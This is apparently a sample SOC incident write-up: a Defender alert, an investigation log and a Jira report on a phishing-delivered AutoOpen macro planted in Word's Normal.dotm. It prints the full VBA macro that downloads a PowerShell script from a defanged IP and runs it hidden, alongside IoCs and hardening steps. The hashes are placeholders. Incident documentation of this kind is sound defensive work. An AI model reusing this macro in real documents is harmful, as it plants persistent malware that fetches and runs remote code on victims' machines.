Microsoft Defender Alert Details
Alert ID: MD-OFFICE-STARTUP-1137-7842 Alert Time: 2024-02-18 09:30:15 EST Severity: HIGH (85/100) Source: Microsoft Defender for Endpoint Rule: “Office Application Startup Persistence Detected” MITRE ATT&CK: T1137.001 – Office Application Startup: Office Template Macros
Alert Details:
Detection: Malicious macro added to Office template for persistence
Host: FIN-WS-078 (Finance Department) User: bturner (Brian Turner, Accountant) Time: 09:25 EST
File Details:
Path: C:\Users\bturner\AppData\Roaming\Microsoft\Templates\Normal.dotm
Modification Time: 09:20 EST
Original Hash: 7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b
Current Hash: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Modified By: WINWORD.EXE (PID: 7842)
Macro Analysis:
Macro Name: “AutoOpen”
VBA Code:
Sub AutoOpen()
Dim objShell As Object
Set objShell = CreateObject(“Wscript.Shell”)
objShell.Run “powershell -WindowStyle Hidden -Command “”Invoke-WebRequest -Uri http://185.143.221[.]89/update.ps1 -OutFile %temp%\update.ps1; powershell -ExecutionPolicy Bypass -File %temp%\update.ps1″””, 0, False
End Sub
Process Tree:
WINWORD.EXE (PID: 7842) – user opened Word
powershell.exe (PID: 7890) – spawned by macro
Network connection to 185.143.221[.]89:80
Detection Logic:
Normal.dotm template modified (unusual)
AutoOpen macro added (auto-executes when Word starts)
Macro downloads and runs PowerShell script
Persistence: Every time Word starts, macro executes
Additional Context:
User opened Word document from email attachment
Document contained macro that modified Normal.dotm
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Defender alert
Microsoft 365 Defender
Confirmed Normal.dotm modification with malicious macro
2. Macro Analysis
Extract and analyze VBA code
Manual review
AutoOpen macro downloads PowerShell payload
3. Network Check
Check for C2 connections
Zscaler Logs, Firewall
Connection to 185.143.221[.]89:80 successful
4. Immediate Action
Remove malicious macro
PowerShell, Word
Normal.dotm restored from backup
5. Host Isolation
Isolate host
Defender
Host quarantined
6. User Interview
Contact user
Teams, Phone
User opened “invoice.docm” from email
Jira Incident Report
Ticket: SOC-2024-091 Summary: T1137 – Office Template Macro Persistence Installed Status: RESOLVED Resolution: MALICIOUS – Persistence Removed Priority: P2 – MEDIUM Labels: T1137, office-startup, macro-persistence, defender, phishing Components: Endpoint-Security, Phishing-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “Office Application Startup Persistence Detected”.
Host: FIN-WS-078 (Finance Department, user bturner).
File: C:\Users\bturner\AppData\Roaming\Microsoft\Templates\Normal.dotm.
Time: 2024-02-18 09:30 EST.
Technique: MITRE ATT&CK T1137.001 – Office Application Startup: Office Template Macros.
2. Technical Analysis:
Attack Chain:
09:10 – User receives email from “vendor@payment-update[.]net”
09:12 – Email contains attachment “invoice.docm”
09:15 – User opens attachment, enables macros (prompted by document)
09:16 – Macro executes, modifies Normal.dotm template
09:17 – AutoOpen macro added to Normal.dotm
09:18 – Word exits (normal)
09:20 – User restarts Word (for legitimate work)
09:21 – AutoOpen macro triggers, downloads PowerShell
09:22 – PowerShell connects to C2
09:25 – Defender detects template modification
Persistence Mechanism:
File: Normal.dotm (global template for Word)
Macro: AutoOpen (runs automatically when Word starts)
Effect: Every time user opens Word, macro downloads and runs payload
Persistence: Survives reboots; triggers on application start
Macro Analysis:
AutoOpen macro downloads update.ps1 from 185.143.221[.]89
update.ps1 (SHA256: b2c3d4e5…) contains Cobalt Strike beacon
Beacon connects to same C2 on port 443
C2 Communication:
Established at 09:22
Beacon every 60 seconds
No data exfiltration before containment
3. Investigation Findings:
Timeline:
09:10 – Phishing email received
09:15 – User opens attachment
09:16-09:17 – Normal.dotm modified
09:20 – Word restarted (legitimate)
09:21-09:22 – Payload downloaded, C2 connected
09:25 – Defender alert
09:27 – SOC investigates
09:30 – Normal.dotm restored
Indicators of Compromise (IoCs):
Files:
– Normal.dotm (modified) – SHA256: a1b2c3d4…
– invoice.docm (original) – SHA256: b2c3d4e5…
– update.ps1 – SHA256: c3d4e5f6…
Network:
– C2: 185.143.221[.]89:80 (download), :443 (beacon)
Email:
– Sender: vendor@payment-update[.]net
– Subject: “Invoice Overdue”
4. Containment Actions:
Immediate Actions:
Restored Normal.dotm from backup (clean version).
Deleted invoice.docm and update.ps1.
Isolated host via Defender.
Blocked C2 IP at firewall.
Host Remediation:
Full scan (no other malware).
Verified Word functions normally.
No reimage needed.
User Remediation:
Password reset.
Phishing training assigned.
Reported email to security team.
5. Root Cause Analysis:
Primary Cause: User opened malicious document and enabled macros.
Contributing Factors:
Macros enabled in Office.
No ASR rule blocking Office from modifying templates.
User lacked recent phishing training.
6. Business Impact:
Operational Impact: Finance workstation offline for 2 hours.
Data Exposure: None (C2 contained).
7. Remediation & Prevention:
Completed Actions:
Normal.dotm restored.
Malware removed.
User educated.
C2 blocked.
Technical Controls Enhanced:
Enabled ASR rule “Block Office applications from creating child processes”.
Blocked macros from internet via GPO.
Set Normal.dotm to read-only via GPO.
Enhanced monitoring for Office template modifications.
8. Conclusion:
A phishing email with a malicious macro modified the user’s Normal.dotm template, installing persistence that triggered every time Word started. Defender detected the template modification, enabling rapid restoration before significant C2 activity occurred.
Closure Rationale: Normal.dotm restored; malware removed; controls enhanced.
Analyst: [Walter White], SOC Analyst Date: 2024-02-18 10:30 EST